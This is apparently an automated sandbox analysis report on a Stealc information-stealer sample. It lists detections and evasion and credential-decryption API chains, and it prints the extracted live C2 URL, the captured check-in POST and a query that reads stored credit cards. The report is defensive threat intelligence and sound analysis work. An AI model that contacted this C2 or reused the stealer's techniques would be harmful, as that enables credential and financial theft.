
Windows Analysis Report
YLshJwBcrT.exe

Overview

General Information

Sample name: YLshJwBcrT.exe (renamed because the original name is a hash value)
Original sample name: 015ac525cdf1038d8ceb75ba43068da0.exe
Analysis ID: 1528648
MD5: 015ac525cdf1038d8ceb75ba43068da0
SHA1: dc28851e6a02c567dfeabcd3d642f06f5f569d5e
SHA256: 33367a662e6fe40c4fc42063a7c676a376674552e4abde488a25695bcc211552
Tags: 32exe

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • YLshJwBcrT.exe (PID: 6780 cmdline: "C:\Users\user\Desktop\YLshJwBcrT.exe" MD5: 015AC525CDF1038D8CEB75BA43068DA0)
    • WerFault.exe (PID: 6572 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 812 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 3208 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 820 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 5260 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 812 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 5560 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 860 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4196 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 984 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 1784 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 1008 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 1892 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 1300 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Extracted malware configuration: {"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_cap"}
Yara matches (network capture):
Source: dump.pcap | Rule: JoeSecurity_Stealc_1 | Description: Yara detected Stealc | Author: Joe Security

Yara matches (memory dumps):
Source: 00000000.00000002.2342767053.000000000085A000.00000040.00000020.00020000.00000000.sdmp | Rule: Windows_Trojan_RedLineStealer_ed346e4c | Description: unknown | Author: unknown
  • Strings: 0xaf8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Source: 00000000.00000002.2342788236.000000000088A000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000003.2063251996.0000000002330000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp | Rule: Windows_Trojan_Smokeloader_3687686f | Description: unknown | Author: unknown
  • Strings: 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
(3 further entries not included in this export)

Yara matches (unpacked PE files):
Source: 0.2.YLshJwBcrT.exe.400000.1.unpack | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 0.3.YLshJwBcrT.exe.2330000.1.raw.unpack | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 0.2.YLshJwBcrT.exe.400000.1.raw.unpack | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 0.3.YLshJwBcrT.exe.2330000.1.unpack | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 0.2.YLshJwBcrT.exe.22e0e67.2.unpack | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
(1 further entry not included in this export)

No Sigma rule has matched

Suricata IDS alerts:
Timestamp: 2024-10-08T07:21:12.143104+0200 | SID: 2044243 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source IP: 192.168.2.5 | Source Port: 49704 | Destination IP: 62.204.41.150 | Destination Port: 80 | Protocol: TCP

AV Detection

Source: 00000000.00000003.2063251996.0000000002330000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_cap"}
Source: http://62.204.41.150/edd20096ecef326d.php- | Virustotal: Detection: 6%
Source: http://62.204.41.150/ | Virustotal: Detection: 9%
Source: http://62.204.41.150/edd20096ecef326d.php | Virustotal: Detection: 14%
Source: http://62.204.41.150/edd20096ecef326d.phpE | Virustotal: Detection: 6%
Source: http://62.204.41.150/edd20096ecef326d.phpI | Virustotal: Detection: 6%
Source: http://62.204.41.150 | Virustotal: Detection: 9%
Source: YLshJwBcrT.exe | Virustotal: Detection: 37%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: YLshJwBcrT.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,0_2_0040C820
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00407240
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00409AC0
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00418EA0
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_00409B60
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_022ECA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_022ECA87
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_022E74A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_022E74A7
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_022E9D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_022E9D27
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_022F9107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_022F9107
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_022E9DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_022E9DC7

Compliance

Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Unpacked PE file: 0.2.YLshJwBcrT.exe.400000.1.unpack
Source: YLshJwBcrT.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_022EE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_022EE697
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_022F3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_022F3B17
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_022F4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022F4B77
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_022EEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_022EEF87
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_022F47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_022F47D7
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_022EE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022EE077
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_022EDCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_022EDCE7
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_022EF8F1 FindFirstFileA,0_2_022EF8F1
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_022EC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_022EC0D7
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_022E1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022E1937
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_022F4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_022F4107
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_022EF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022EF917

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 62.204.41.150:80
Source: Malware configuration extractor | URLs: http://62.204.41.150/edd20096ecef326d.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 62.204.41.150 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GIEHIDHJDBFIIECAKECB | Host: 62.204.41.150 | Content-Length: 219 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 34 46 34 41 38 42 33 46 41 38 33 31 34 38 31 35 32 38 31 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 2d 2d 0d 0a | Data Ascii: ------GIEHIDHJDBFIIECAKECB Content-Disposition: form-data; name="hwid" B64F4A8B3FA83148152816 ------GIEHIDHJDBFIIECAKECB Content-Disposition: form-data; name="build" default6_cap ------GIEHIDHJDBFIIECAKECB--
Source: Joe Sandbox View | IP Address: 62.204.41.150
Source: Joe Sandbox View | ASN Name: TNNET-ASTNNetOyMainnetworkFI
Source: unknown | TCP traffic detected without corresponding DNS query: 62.204.41.150 (reported 8 times)
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00404880
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 62.204.41.150 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GIEHIDHJDBFIIECAKECB | Host: 62.204.41.150 | Content-Length: 219 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 34 46 34 41 38 42 33 46 41 38 33 31 34 38 31 35 32 38 31 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 2d 2d 0d 0a | Data Ascii: ------GIEHIDHJDBFIIECAKECB Content-Disposition: form-data; name="hwid" B64F4A8B3FA83148152816 ------GIEHIDHJDBFIIECAKECB Content-Disposition: form-data; name="build" default6_cap ------GIEHIDHJDBFIIECAKECB--
Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.000000000088A000.00000004.00000020.00020000.00000000.sdmp, YLshJwBcrT.exe, 00000000.00000002.2342721948.000000000084E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.150
Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.000000000088A000.00000004.00000020.00020000.00000000.sdmp, YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.150/
Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.150/e
Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.0000000000883000.00000004.00000020.00020000.00000000.sdmp, YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php
Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php-
Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpE
Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpG
Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpI
Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpQ
Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpS
Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.00000000008BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpt
Source: YLshJwBcrT.exe, 00000000.00000002.2342721948.000000000084E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.1503
Source: Amcache.hve.4.dr | String found in binary or memory: http://upx.sf.net

System Summary

Source: 00000000.00000002.2342767053.000000000085A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: String function: 004045C0 appears 317 times
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 812
Source: YLshJwBcrT.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.2342767053.000000000085A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: YLshJwBcrT.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.evad.winEXE@8/29@0/1
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Code function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413720
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\IVQU5RT5.htm
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6780
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\24ac4273-1c21-419f-800f-588e35937c8a
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: YLshJwBcrT.exe, 00000000.00000002.2342788236.0000000000883000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cardss;
Source: YLshJwBcrT.exe | Virustotal: Detection: 37%
Source: unknown | Process created: C:\Users\user\Desktop\YLshJwBcrT.exe "C:\Users\user\Desktop\YLshJwBcrT.exe"
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 812
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 820
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 812
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 860
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 984
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 1008
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 1300
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Section loaded: wuliwiyixenotafube.dll
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\YLshJwBcrT.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

                    Data Obfuscation

                    barindex
